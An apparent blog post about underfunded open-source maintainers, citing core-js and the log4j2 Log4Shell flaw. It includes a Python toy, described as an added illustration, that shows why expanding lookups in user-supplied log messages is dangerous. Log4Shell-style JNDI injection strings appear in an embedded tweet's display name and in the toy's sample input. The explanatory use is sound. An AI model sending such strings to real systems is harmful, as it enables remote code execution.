`core-js` is a JavaScript library that polyfills a lot of core primitives into
JavaScript's standard library, so that you often don't need to reach for other
libraries. This library is also infamous for letting you know that the author
is looking for a job every time you install it in CI. You have probably seen
this message in your CI a thousand times:
```
Thank you for using core-js ( https://github.com/zloirock/core-js ) for
polyfilling JavaScript standard library!
The project needs your help! Please consider supporting of core-js on Open
Collective or Patreon:
> https://opencollective.com/core-js
> https://www.patreon.com/zloirock
Also, the author of core-js ( https://github.com/zloirock ) is looking for a
good job :-)
```
The author of the project is either still in prison for vehicular manslaughter
or has just been released. `core-js` is a dependency of React. How many of you
have actually donated to this project? Especially if you use React?
Now let's turn our eyes to `log4j2`. This project is effectively part of the
standard library for Java users. It is so ingrained into modern Java that you'd
expect its developers to be well-funded and able to focus on nothing but that
library, right?
No.
<center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.<br><br>"I work on Log4j in my spare time"<br>"always dreamed of working on open source full time"<br>"3 sponsors are funding <a href="https://twitter.com/rgoers?ref_src=twsrc%5Etfw">@rgoers</a>'s work: Michael, Glenn, Matt"<br><br>People, what are we doing. <a href="https://t.co/2hAxUWCjuC">pic.twitter.com/2hAxUWCjuC</a></p>— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) <a href="https://twitter.com/FiloSottile/status/1469441487175880711?ref_src=twsrc%5Etfw">December 10, 2021</a></blockquote></center>
As of yesterday, there were a grand total of three sponsors for this person's
work. THREE. As of today, this number is now 14; however, this is no excuse.
This person should be funded at a level appropriate for how critical `log4j2`
is to the ecosystem. There is no excuse for this. This person's _spare time
passion project_ is responsible for half of the internet working the way it
should. Companies vulnerable to this issue included Apple, Google, my cell phone
carrier and basically everyone that uses JavaEE in its default configuration.
[Seriously, I could trigger some part of my cell carrier's infra reaching
out to a DNS server with a specially crafted SMS
message.](conversation://Cadey/facepalm)
If `log4j2` is responsible for your company's success, you have a moral
obligation to [donate to the person who creates this library
thanklessly](https://github.com/sponsors/rgoers).
[As for the problem that created this vulnerability in the first place: what
were they THINKING when they allowed user-submitted untrusted strings to
contain JNDI references that would then cause the JVM to load arbitrary bytecode
into RAM and then run it without having to specify that in the format string to
begin with? Like why would you even need to do that in the _user-supplied_ part
of the format string? What would this even accomplish other than being a great
way to get a shell whenever you wanted?](conversation://Numa/stare)
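To make the design point in that aside concrete, here is a constructed toy in Python. It is an added illustration, not code from this post and not `log4j2`'s own implementation. It assumes a made-up lookup syntax `${prefix:argument}`, a `%m` placeholder for the message, a tiny table of purely local lookups (`upper`, `level`), and treats any other prefix such as `jndi` as a lookup that would reach a remote resource, which it refuses and records rather than performs. The vulnerable variant expands lookups after the user-supplied message has been spliced into the line; the hardened variant expands them only in the developer-controlled pattern and treats the message as opaque data.

```python
import re

# Constructed toy lookup syntax: one innermost ${prefix:argument} with no "${"
# inside the braces. Nested lookups are resolved inside-out by repeated passes.
LOOKUP = re.compile(r"\$\{([a-z]+):([^${}]*)\}")

# Lookups that only touch local process state and are safe for a logger to run.
LOCAL_LOOKUPS = {
    "upper": lambda arg: arg.upper(),
    "level": lambda arg: "INFO",  # stand-in for "the current log level"
}

REFUSED = "[refused lookup]"


def expand_lookups(text, refused):
    """Expand ${prefix:arg} lookups in text, innermost first.

    Local prefixes are evaluated in place. Any other prefix (jndi, for one)
    stands for a lookup that would fetch something from a remote service; this
    toy never performs it, it appends the raw lookup to `refused` and replaces
    it with a marker so the loop terminates.
    """
    while True:
        m = LOOKUP.search(text)
        if m is None:
            return text
        prefix, arg = m.group(1), m.group(2)
        if prefix in LOCAL_LOOKUPS:
            replacement = LOCAL_LOOKUPS[prefix](arg)
        else:
            refused.append(m.group(0))
            replacement = REFUSED
        text = text[:m.start()] + replacement + text[m.end():]


def log_vulnerable(pattern, message):
    """Splice the message into the pattern FIRST, then expand lookups over the
    whole line. Lookups hidden in user-supplied message text get evaluated."""
    refused = []
    line = expand_lookups(pattern.replace("%m", message), refused)
    return line, refused


def log_hardened(pattern, message):
    """Expand lookups only in the developer-controlled pattern, then splice the
    message in as opaque data that is never interpreted."""
    refused = []
    line = expand_lookups(pattern, refused).replace("%m", message)
    return line, refused


# Constructed sample input: the pattern is chosen by the developer, the message
# carries text copied straight from an untrusted request header.
PATTERN = "${upper:app} ${level:x}: %m"
UNTRUSTED_MESSAGE = "login failed for user-agent ${jndi:ldap://example.invalid/x}"

if __name__ == "__main__":
    for name, logger in (("vulnerable", log_vulnerable), ("hardened", log_hardened)):
        line, refused = logger(PATTERN, UNTRUSTED_MESSAGE)
        print(f"{name}: {line}")
        print(f"  lookups attempted from user input: {refused}")
```

The difference is only the order of two operations, which is the whole point: a logger should interpret the text the developer wrote and nothing else. Once the message is treated as data rather than template, it no longer matters what lookup syntax an attacker puts in a header, because nothing ever tries to resolve it.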
There is a friend of mine who has been thanklessly maintaining an online radio
station stack for a long time. He has been abused by his users. Users will throw
5 bucks in the tip jar and then get very angry when he doesn't drop everything
and fix their incredibly specific problems on a moment's notice. He has tried to
get jobs at various places, but every time they try to screw him out of
ownership of his own projects and he has to turn them down. Meanwhile the cash
bleed continues.
This is why I am very careful about how I make "useful" software and release it
to the world without any solid way for me to get paid for my efforts. I simply
do not want to be in a situation where software I develop as a passion project
on the side is holding people's companies together. That's why I make software
how and where I do. Like, no offense, but I really do not want to go unpaid for
my efforts. The existing leech culture of "Open Source" being a pool of free
labor makes it hard for me to want my side projects to be that useful unless
you pay me.
[Okay, part of this may also be an ADHD thing and not really being able to stick
to projects longer term.](conversation://Cadey/coffee)
TL;DR: If you want me to make you useful software, pay me. If you use software
made by others in their spare time and find it useful, pay them. This should not
be a controversial opinion. This should not be a new thing. This should already
be the state of the world and it is amazingly horrible for us to have the people
that make the things that make our software work at all starve and beg for